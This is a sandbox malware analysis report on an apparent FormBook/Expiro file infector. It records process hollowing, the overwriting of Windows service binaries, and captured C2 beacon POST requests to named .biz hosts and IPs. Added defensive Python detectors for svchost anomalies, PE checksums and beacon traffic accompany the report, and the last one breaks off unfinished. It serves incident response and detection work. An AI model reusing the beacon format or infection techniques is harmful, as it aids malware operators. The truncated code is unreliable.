Windows Analysis Report
LiuUGJK9vH.exe

Overview

General Information

Sample name: LiuUGJK9vH.exe (renamed because the original name is a hash value)
Original sample name: 1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2.exe
Analysis ID: 1588299
MD5: 690a2cbb7f785f6f90a0b510f31d40de
SHA1: 624e1b8b472706e33e7d9b90ac1626153854433f
SHA256: 1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2
Tags: exe, Worm, m0yv, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files in the system32 config directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LiuUGJK9vH.exe (PID: 4452 cmdline: "C:\Users\user\Desktop\LiuUGJK9vH.exe" MD5: 690A2CBB7F785F6F90A0B510F31D40DE)
    • svchost.exe (PID: 4420 cmdline: "C:\Users\user\Desktop\LiuUGJK9vH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 5612 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 1E28FD404AAE9396AA5D6A1141873E0E)
  • alg.exe (PID: 5960 cmdline: C:\Windows\System32\alg.exe MD5: 01FCE6399A1AC48F9D7931507B2534BB)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1196 cmdline: C:\Windows\system32\AppVClient.exe MD5: 04218364223ED3D355D0195140331BD0)
  • cleanup
No configs have been found
Yara matches (rule JoeSecurity_FormBook_1, description "Yara detected FormBook", author Joe Security; no matched strings listed):
  • Memory dump 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp
  • Memory dump 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp
  • Unpacked PE 4.2.svchost.exe.400000.0.raw.unpack
  • Unpacked PE 4.2.svchost.exe.400000.0.unpack

          System Summary

          Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ParentImage: C:\Users\user\Desktop\LiuUGJK9vH.exe, ParentProcessId: 4452, ParentProcessName: LiuUGJK9vH.exe, ProcessCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ProcessId: 4420, ProcessName: svchost.exe
          Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ParentImage: C:\Users\user\Desktop\LiuUGJK9vH.exe, ParentProcessId: 4452, ParentProcessName: LiuUGJK9vH.exe, ProcessCommandLine: "C:\Users\user\Desktop\LiuUGJK9vH.exe", ProcessId: 4420, ProcessName: svchost.exe
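The two svchost.exe events above (PID 4420) show C:\Windows\SysWOW64\svchost.exe started by the sample on the desktop, carrying the sample's own command line instead of an svchost.exe -k line. Together with the NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtSetContextThread and NtResumeThread stubs the report lists for svchost.exe further down (at 0x03B7xxxx, inside the region where it also found the wntdll.pdb string, i.e. a privately mapped copy of ntdll), this is the process-hollowing pattern behind the "Uncommon Svchost Parent Process" hit. The following is an added example, not part of the Joe Sandbox report or of the Sigma rule, that applies the same two checks to constructed Sysmon-style events; the parent allow-list and the expectation of a -k service group are simplifying assumptions.

```python
"""Checks for the svchost.exe anomaly recorded in the Sigma events above: the
child is C:\\Windows\\SysWOW64\\svchost.exe, but its parent is the sample on the
desktop and its command line is the parent's, which is what a hollowed process
looks like in process-creation telemetry. Added example over constructed
Sysmon-style events; not part of the Joe Sandbox report or Sigma."""
import ntpath

# Parents that legitimately start svchost.exe. Deliberately shorter than the Sigma
# rule's allow-list (assumption: extend it from the fleet's own baseline).
EXPECTED_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "svchost.exe"}
EXPECTED_IMAGES = {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"}


def analyse_svchost_event(event):
    """Return the anomalies found in one process-creation event, or [] if the
    event is not an svchost.exe start or looks normal."""
    image = event.get("Image", "")
    if ntpath.basename(image).lower() != "svchost.exe":
        return []
    reasons = []
    if image.lower() not in EXPECTED_IMAGES:
        reasons.append(f"svchost.exe started from unexpected path {image}")
    parent_image = event.get("ParentImage", "")
    if ntpath.basename(parent_image).lower() not in EXPECTED_PARENTS:
        reasons.append(f"uncommon parent {parent_image or '<unknown>'} "
                       f"(pid {event.get('ParentProcessId')})")
    cmd = event.get("CommandLine", "")
    if "svchost" not in cmd.lower():
        # Hollowing keeps the suspended child's original command line; here it is the parent's.
        reasons.append(f"command line does not name svchost.exe: {cmd}")
    elif " -k " not in f" {cmd} ":
        # services.exe always passes a service group (assumption: no custom launchers).
        reasons.append("svchost.exe started without a -k service group")
    return reasons


def scan(events):
    """Map ProcessId -> anomalies for every flagged event in a batch."""
    return {e["ProcessId"]: r for e in events if (r := analyse_svchost_event(e))}


# Event values copied from the Sigma hit in the report (PID 4420 under PID 4452).
REPORT_EVENT = {
    "Image": r"C:\Windows\SysWOW64\svchost.exe",
    "CommandLine": r'"C:\Users\user\Desktop\LiuUGJK9vH.exe"',
    "ParentImage": r"C:\Users\user\Desktop\LiuUGJK9vH.exe",
    "ParentProcessId": 4452,
    "ProcessId": 4420,
}
# Constructed baseline event for a normal service-host start.
BENIGN_EVENT = {
    "Image": r"C:\Windows\System32\svchost.exe",
    "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
    "ParentImage": r"C:\Windows\System32\services.exe",
    "ParentProcessId": 700,
    "ProcessId": 1234,
}

if __name__ == "__main__":
    for pid, reasons in scan([REPORT_EVENT, BENIGN_EVENT]).items():
        print(pid, *reasons, sep="\n  ")
```

Run against a Sysmon event ID 1 feed, the parent check alone already catches this sample; the command-line check is the one that survives when an infector picks a parent that is on the allow-list.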
          Timestamp                          SID      Severity  Classtype                                       Source IP:Port       Destination IP:Port   Protocol
          2025-01-10T23:40:54.311918+0100    2850851  1         Malware Command and Control Activity Detected   192.168.2.8:49704    54.244.188.177:80     TCP
          2025-01-10T23:40:54.447678+0100    2018141  1         A Network Trojan was detected                   54.244.188.177:80    192.168.2.8:49704     TCP
          2025-01-10T23:40:54.447678+0100    2037771  1         A Network Trojan was detected                   54.244.188.177:80    192.168.2.8:49704     TCP


          AV Detection

          Source: LiuUGJK9vH.exe | Avira: detected
          Source: http://54.244.188.177/ | Avira URL Cloud: Label: malware
          Source: http://54.244.188.177/hdjf~A | Avira URL Cloud: Label: malware
          Source: http://54.244.188.177/hdjf | Avira URL Cloud: Label: malware
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exe | Avira: detection malicious, Label: W32/Infector.Gen
          Source: LiuUGJK9vH.exe | ReversingLabs: Detection: 91%
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.1792348155.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.1793038630.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exe | Joe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exe | Joe Sandbox ML: detected
          Source: LiuUGJK9vH.exe | Joe Sandbox ML: detected
          Source: LiuUGJK9vH.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1459636308.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

          Spreading

          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046445A: GetFileAttributesW, FindFirstFileW, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046C6D1: FindFirstFileW, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046C75C: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046EF95: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046F0F2: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046F3F3: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_004637EF: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_00463B12: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046BCBC: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
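The sample overwrote four Microsoft service binaries in place (armsvc.exe, DiagnosticsHub.StandardCollector.Service.exe, AppVClient.exe, alg.exe) and Avira labels the results W32/Infector.Gen, so a host that ran this sample needs its service binaries checked, not just the dropped sample removed. The authoritative check is Authenticode validation of each file, since an infected copy no longer verifies. The added example below, which is not part of the Joe Sandbox report or its tooling, shows the cheaper static triage behind two of the report's own signatures, "PE file contains an invalid checksum" and "PE file contains sections with non-standard names": it reimplements the PE CheckSum algorithm and flags section names outside the usual compiler set. The section-name allow-list is an assumption, and the input is a constructed minimal PE32 image so that the code runs offline.

```python
"""PE integrity triage for the overwritten service binaries named above.
Added example, not part of the Joe Sandbox report: recomputes the PE header
CheckSum (the ImageHlp CheckSumMappedFile algorithm) and lists section names
outside the usual compiler set. Input is a constructed minimal PE32."""
import struct

# Section names emitted by the usual Microsoft toolchains (assumption: extend per fleet).
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".tls", ".bss", ".CRT", ".textbss", ".didat"}


def _pe_offsets(data):
    """Return (e_lfanew, optional header offset, number of sections, optional header size)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    return e_lfanew, e_lfanew + 24, nsec, opt_size


def pe_checksum(data):
    """Recompute CheckSum: ones'-complement fold of every dword except the
    CheckSum field itself, folded to 16 bits, plus the file length."""
    _, opt, _, _ = _pe_offsets(data)
    skip = (opt + 0x40) & ~3              # dword holding the stored CheckSum
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def stored_checksum(data):
    _, opt, _, _ = _pe_offsets(data)
    return struct.unpack_from("<I", data, opt + 0x40)[0]


def section_names(data):
    _, opt, nsec, opt_size = _pe_offsets(data)
    first = opt + opt_size                # section table follows the optional header
    return [data[first + i * 40:first + i * 40 + 8].rstrip(b"\0").decode("latin-1")
            for i in range(nsec)]


def triage(data):
    """Return the findings a responder should see for one PE image."""
    findings = []
    stored, computed = stored_checksum(data), pe_checksum(data)
    if stored and stored != computed:     # 0 means "never set"; the loader accepts that too
        findings.append(f"invalid checksum: header {stored:#010x}, computed {computed:#010x}")
    odd = [n for n in section_names(data) if n not in STANDARD_SECTIONS]
    if odd:
        findings.append("non-standard section names: " + ", ".join(odd))
    return findings


def build_test_pe(sections):
    """Constructed minimal PE32 (not a real sample): DOS stub, COFF header,
    0xE0-byte optional header, one 0x200-byte raw block per section."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic; CheckSum left 0
    table_end = 0x138 + 40 * len(sections)
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), 0x200, 0x1000 * (i + 1),
                    0x200, table_end + 0x200 * i, 0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(sections))
    return dos + coff + bytes(opt) + hdrs + b"\xCC" * (0x200 * len(sections))


def set_checksum(data):
    """Write a correct CheckSum into the header, as the linker does."""
    out = bytearray(data)
    _, opt, _, _ = _pe_offsets(data)
    struct.pack_into("<I", out, opt + 0x40, pe_checksum(data))
    return bytes(out)


if __name__ == "__main__":
    sample = bytearray(set_checksum(build_test_pe([".text", ".rdata", ".data", ".inject"])))
    sample[-1] ^= 0xFF                                              # simulate a patched code byte
    print(triage(bytes(sample)))
```

A stale checksum is a hint, not a verdict: legitimately rebuilt or hot-patched binaries can carry one too, and an infector can recompute it. Treat a hit as a reason to pull the file and validate its signature and hash against a known-good copy.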

          Networking

          Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.8:49704 -> 54.244.188.177:80
          Source: Joe Sandbox View | IP Address: 54.244.188.177
          Source: Joe Sandbox View | IP Address: 18.141.10.107
          Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.8:49704
          Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.8:49704
          Source: global traffic | HTTP traffic detected:
              POST /hdjf HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: pywolwnvd.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 802
          Source: global traffic | HTTP traffic detected:
              POST /rai HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: ssbzmoy.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 802
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_004722EE: InternetReadFile, InternetQueryDataAvailable, InternetReadFile
          Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
          Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
          Source: unknown | HTTP traffic detected:
              POST /hdjf HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              Host: pywolwnvd.biz
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
              Content-Length: 802
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/8
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/rai
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/raiI
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/raie
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/x
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107:80/rai
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/hdjf
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480616556.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/hdjf~A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_00474164: OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, _wcscpy, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_00473F66: OpenClipboard, IsClipboardFormatAvailable, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, GlobalLock, CloseClipboard, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, DragQueryFileW, DragQueryFileW, DragQueryFileW, GlobalUnlock, CountClipboardFormats, CloseClipboard
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0046001C: GetKeyboardState, SetKeyboardState, GetAsyncKeyState, GetAsyncKeyState, GetKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function 0_2_0048CABC: DefDlgProcW, SendMessageW, GetWindowLongW, SendMessageW, SendMessageW, _wcsncpy, GetKeyState, GetKeyState, GetKeyState, SendMessageW, GetKeyState, SendMessageW, SendMessageW, SendMessageW, ImageList_SetDragCursorImage, ImageList_BeginDrag, SetCapture, ClientToScreen, ImageList_DragEnter, InvalidateRect, ReleaseCapture, GetCursorPos, ScreenToClient, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, GetCursorPos, ScreenToClient, GetParent, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, GetWindowLongW
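Both captured POSTs share one fingerprint: a .biz host, a short lowercase path (/hdjf, /rai), Cache-Control and Pragma set to no-cache, an 802-byte body, and a User-Agent that claims Windows 7 (NT 6.1), Chrome 39 and WeChat/QQBrowser components on what is a Windows 10 analysis machine. The Suricata hits show 54.244.188.177 answering with AnubisNetworks sinkhole cookies, so the C2 had already been sinkholed when the analysis ran; the beacon itself is still the infection indicator to hunt for. The added example below, which is not part of the Joe Sandbox report, parses raw request heads and scores them against those indicators. Host, path and User-Agent values are taken from the report, the generic beacon-shape heuristic is an assumption, and the request text is reconstructed or constructed input.

```python
"""Matcher for the two C2 beacons captured above (POST /hdjf to pywolwnvd.biz and
POST /rai to ssbzmoy.biz). Added example over constructed request text; the
host, path and User-Agent values come from the report, the generic
"beacon-shaped POST" heuristic is an assumption."""
import re

C2_HOSTS = {"pywolwnvd.biz", "ssbzmoy.biz", "54.244.188.177", "18.141.10.107"}
C2_PATHS = {"/hdjf", "/rai"}
# Exact User-Agent from both captured POSTs. It claims Windows 7 (NT 6.1), a 2014-era
# Chrome 39 and WeChat/QQBrowser add-ons, none of which fit a stock Windows 10 host.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, path and lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def score_request(req):
    """Return the indicators one parsed request matches (empty list = no match)."""
    h, hits = req["headers"], []
    host = h.get("host", "").split(":")[0].lower()
    if host in C2_HOSTS:
        hits.append(f"known C2 host {host}")
    if h.get("user-agent") == BEACON_UA:
        hits.append("exact beacon User-Agent")
    if req["method"] == "POST" and req["path"] in C2_PATHS:
        hits.append(f"known C2 path {req['path']}")
    # Generic shape shared by both captures: POST to a short lowercase path with
    # no-cache directives and a small body (assumed heuristic; tune on real traffic).
    length = h.get("content-length", "")
    if (req["method"] == "POST" and re.fullmatch(r"/[a-z]{2,6}", req["path"])
            and h.get("cache-control") == "no-cache" and h.get("pragma") == "no-cache"
            and length.isdigit() and int(length) < 2048):
        hits.append("beacon-shaped POST (no-cache, short path, small body)")
    return hits


def scan(requests):
    """Index -> indicators for every request in a batch that matched anything."""
    return {i: s for i, r in enumerate(requests) if (s := score_request(parse_request(r)))}


def _request(method, path, host, ua, before=(), after=()):
    """Constructed request text in the header order the sandbox printed."""
    lines = [f"{method} {path} HTTP/1.1", *before, f"Host: {host}", f"User-Agent: {ua}", *after]
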